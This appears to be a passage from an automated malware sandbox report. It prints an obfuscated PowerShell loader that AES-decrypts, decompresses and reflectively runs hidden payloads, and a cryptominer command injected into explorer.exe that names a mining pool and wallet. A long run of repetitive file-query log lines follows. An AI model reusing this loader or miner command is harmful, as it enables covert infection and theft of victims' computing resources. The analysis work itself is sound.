$jczrwmspqgk.createtype();}$fmzqsfzpmgsno=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+[char](121)+''+[char](115)+''+[char](116)+'em'+'.'+''+[char](100)+'ll')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+'o'+''+'f'+''+[char](116)+'.'+[char](87)+'in'+[char](51)+''+[char](50)+''+[char](46)+''+'u'+'ns'+'a'+''+'f'+''+'e'+''+[char](78)+''+'a'+'t'+[char](105)+''+'v'+'em'+[char](101)+''+[char](116)+''+'h'+'o'+[char](100)+''+[char](115)+'');$kczxemormgvaoj=$fmzqsfzpmgsno.getmethod(''+[char](71)+''+[char](101)+''+'t'+''+[
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 'c:\users\user\appdata\local\temp\b.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] ('')); Jump to behavior
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,94_2_0000000140002300
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,94_2_0000000140002300
        Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000025EE91C2AF0 cpuid 18_3_0000025EE91C2AF0
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeQueries volume information: C:\Users\user\Desktop\e7WMhx18XN.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
